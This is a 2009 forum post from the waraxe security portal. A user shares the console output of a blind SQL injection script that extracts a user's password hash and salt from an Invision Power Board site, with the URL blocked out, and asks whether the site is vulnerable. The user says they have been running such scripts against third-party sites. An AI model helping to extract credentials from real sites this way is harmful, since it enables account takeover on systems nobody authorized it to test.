Waraxe IT Security Portal
Login or Register
November 16, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 69
Members: 0
Total: 69
Full disclosure
SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879)
Security issue in the TX Text Control .NET Server for ASP.NET.
SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater
Unsafe eval() in TestRail CLI
4 vulnerabilities in ibmsecurity
32 vulnerabilities in IBM Security Verify Access
xlibre Xnest security advisory & bugfix releases
APPLE-SA-10-29-2024-1 Safari 18.1
SEC Consult SA-20241030-0 :: Query Filter Injection in Ping Identity PingIDM (formerly known as ForgeRock Identity Management) (CVE-2024-23600)
SEC Consult SA-20241023-0 :: Authenticated Remote Code Execution in Multiple Xerox printers (CVE-2024-6333)
APPLE-SA-10-28-2024-8 visionOS 2.1
APPLE-SA-10-28-2024-7 tvOS 18.1
APPLE-SA-10-28-2024-6 watchOS 11.1
APPLE-SA-10-28-2024-5 macOS Ventura 13.7.1
APPLE-SA-10-28-2024-4 macOS Sonoma 14.7.1
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Invision Power Board -> Bizarre Output? (IPB <= 2.3.5 by waraxe)
Post new topicReply to topic View previous topic :: View next topic
Bizarre Output? (IPB <= 2.3.5 by waraxe)
PostPosted: Sun Jul 12, 2009 6:56 pm Reply with quote
renaker
Active user
Active user
Joined: Nov 15, 2008
Posts: 27




I've been using the script for a while now, and it still rocks. However, I've come across a site that appears to be vuln, but the info it retrieves is not accurate. Mind you, it's an IPB 2.1.7 board, and I'm not sure if the script is only for the 2.3.x series. Anyways, here's the output. I was just wondering if the site is vulnerable or not? I already tried a few other scripts for that IPB version, no luck. It's on not on debug mode or any of that jazz.


Code:
C:\path\php>php waraxe2.php
Target: http://<BLOCKED>.com/
Sql table prefix: ibf_
Testing target URL ...
Target URL seems to be valid
Testing ID 3
ID 3 validated
Finding hash ...
Char to find is [a-f]
Current test: 99-102-99
Current test: 100-102-100
Current test: 101-102-101
Got pos 1 --> f
Current hash: f
Char to find is [a-f]
Current test: 99-102-99
Current test: 100-102-100
Current test: 101-102-101
Got pos 2 --> f
Current hash: ff
Char to find is [a-f]
Current test: 99-102-99
Current test: 100-102-100
Current test: 101-102-101
Got pos 3 --> f
Current hash: fff
Char to find is [a-f]
Current test: 99-102-99
Current test: 100-102-100
Current test: 101-102-101
Got pos 4 --> f
Current hash: ffff
Char to find is [a-f]
Current test: 99-102-99
Current test: 100-102-100
Current test: 101-102-101
Got pos 5 --> f
Current hash: fffff
Char to find is [a-f]
Current test: 99-102-99
Current test: 100-102-100
Current test: 101-102-101
Got pos 6 --> f
Current hash: ffffff
Char to find is [a-f]
Current test: 99-102-99
Current test: 100-102-100
Current test: 101-102-101
Got pos 7 --> f
Current hash: fffffff
Char to find is [a-f]
Current test: 99-102-99
Current test: 100-102-100
Current test: 101-102-101
Got pos 8 --> f
Current hash: ffffffff
Char to find is [a-f]
Current test: 99-102-99
Current test: 100-102-100
Current test: 101-102-101
Got pos 9 --> f
Current hash: fffffffff
Char to find is [a-f]
Current test: 99-102-99
Current test: 100-102-100
Current test: 101-102-101
Got pos 10 --> f
Current hash: ffffffffff
Char to find is [a-f]
Current test: 99-102-99
Current test: 100-102-100
Current test: 101-102-101
Got pos 11 --> f
Current hash: fffffffffff
Char to find is [a-f]
Current test: 99-102-99
Current test: 100-102-100
Current test: 101-102-101
Got pos 12 --> f
Current hash: ffffffffffff
Char to find is [a-f]
Current test: 99-102-99
Current test: 100-102-100
Current test: 101-102-101
Got pos 13 --> f
Current hash: fffffffffffff
Char to find is [a-f]
Current test: 99-102-99
Current test: 100-102-100
Current test: 101-102-101
Got pos 14 --> f
Current hash: ffffffffffffff
Char to find is [a-f]
Current test: 99-102-99
Current test: 100-102-100
Current test: 101-102-101
Got pos 15 --> f
Current hash: fffffffffffffff
Char to find is [a-f]
Current test: 99-102-99
Current test: 100-102-100
Current test: 101-102-101
Got pos 16 --> f
Current hash: ffffffffffffffff
Char to find is [a-f]
Current test: 99-102-99
Current test: 100-102-100
Current test: 101-102-101
Got pos 17 --> f
Current hash: fffffffffffffffff
Char to find is [a-f]
Current test: 99-102-99
Current test: 100-102-100
Current test: 101-102-101
Got pos 18 --> f
Current hash: ffffffffffffffffff
Char to find is [a-f]
Current test: 99-102-99
Current test: 100-102-100
Current test: 101-102-101
Got pos 19 --> f
Current hash: fffffffffffffffffff
Char to find is [a-f]
Current test: 99-102-99
Current test: 100-102-100
Current test: 101-102-101
Got pos 20 --> f
Current hash: ffffffffffffffffffff
Char to find is [a-f]
Current test: 99-102-99
Current test: 100-102-100
Current test: 101-102-101
Got pos 21 --> f
Current hash: fffffffffffffffffffff
Char to find is [a-f]
Current test: 99-102-99
Current test: 100-102-100
Current test: 101-102-101
Got pos 22 --> f
Current hash: ffffffffffffffffffffff
Char to find is [a-f]
Current test: 99-102-99
Current test: 100-102-100
Current test: 101-102-101
Got pos 23 --> f
Current hash: fffffffffffffffffffffff
Char to find is [a-f]
Current test: 99-102-99
Current test: 100-102-100
Current test: 101-102-101
Got pos 24 --> f
Current hash: ffffffffffffffffffffffff
Char to find is [a-f]
Current test: 99-102-99
Current test: 100-102-100
Current test: 101-102-101
Got pos 25 --> f
Current hash: fffffffffffffffffffffffff
Char to find is [a-f]
Current test: 99-102-99
Current test: 100-102-100
Current test: 101-102-101
Got pos 26 --> f
Current hash: ffffffffffffffffffffffffff
Char to find is [a-f]
Current test: 99-102-99
Current test: 100-102-100
Current test: 101-102-101
Got pos 27 --> f
Current hash: fffffffffffffffffffffffffff
Char to find is [a-f]
Current test: 99-102-99
Current test: 100-102-100
Current test: 101-102-101
Got pos 28 --> f
Current hash: ffffffffffffffffffffffffffff
Char to find is [a-f]
Current test: 99-102-99
Current test: 100-102-100
Current test: 101-102-101
Got pos 29 --> f
Current hash: fffffffffffffffffffffffffffff
Char to find is [a-f]
Current test: 99-102-99
Current test: 100-102-100
Current test: 101-102-101
Got pos 30 --> f
Current hash: ffffffffffffffffffffffffffffff
Char to find is [a-f]
Current test: 99-102-99
Current test: 100-102-100
Current test: 101-102-101
Got pos 31 --> f
Current hash: fffffffffffffffffffffffffffffff
Char to find is [a-f]
Current test: 99-102-99
Current test: 100-102-100
Current test: 101-102-101
Got pos 32 --> f
Current hash: ffffffffffffffffffffffffffffffff

Final hash for ID 3: ffffffffffffffffffffffffffffffff

Finding salt ...
Current test: 80-128-80
Current test: 104-128-104
Current test: 116-128-116
Current test: 122-128-122
Current test: 125-128-125
Current test: 126-128-126
Current test: 127-128-127
Got pos 1 --> Ç
Current salt: Ç
Current test: 80-128-80
Current test: 104-128-104
Current test: 116-128-116
Current test: 122-128-122
Current test: 125-128-125
Current test: 126-128-126
Current test: 127-128-127
Got pos 2 --> Ç
Current salt: ÇÇ
Current test: 80-128-80
Current test: 104-128-104
Current test: 116-128-116
Current test: 122-128-122
Current test: 125-128-125
Current test: 126-128-126
Current test: 127-128-127
Got pos 3 --> Ç
Current salt: ÇÇÇ
Current test: 80-128-80
Current test: 104-128-104
Current test: 116-128-116
Current test: 122-128-122
Current test: 125-128-125
Current test: 126-128-126
Current test: 127-128-127
Got pos 4 --> Ç
Current salt: ÇÇÇÇ
Current test: 80-128-80
Current test: 104-128-104
Current test: 116-128-116
Current test: 122-128-122
Current test: 125-128-125
Current test: 126-128-126
Current test: 127-128-127
Got pos 5 --> Ç
Current salt: ÇÇÇÇÇ

Final salt for ID 3: ÇÇÇÇÇ


------------------------------------------
User ID: 3
Hash: ffffffffffffffffffffffffffffffff
Salt: ÇÇÇÇÇ
------------------------------------------

Questions and feedback - http://www.waraxe.us/
See ya! :)

C:\path\php>
View user's profile Send private message
Bizarre Output? (IPB <= 2.3.5 by waraxe)
www.waraxe.us Forum Index -> Invision Power Board
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.045 Seconds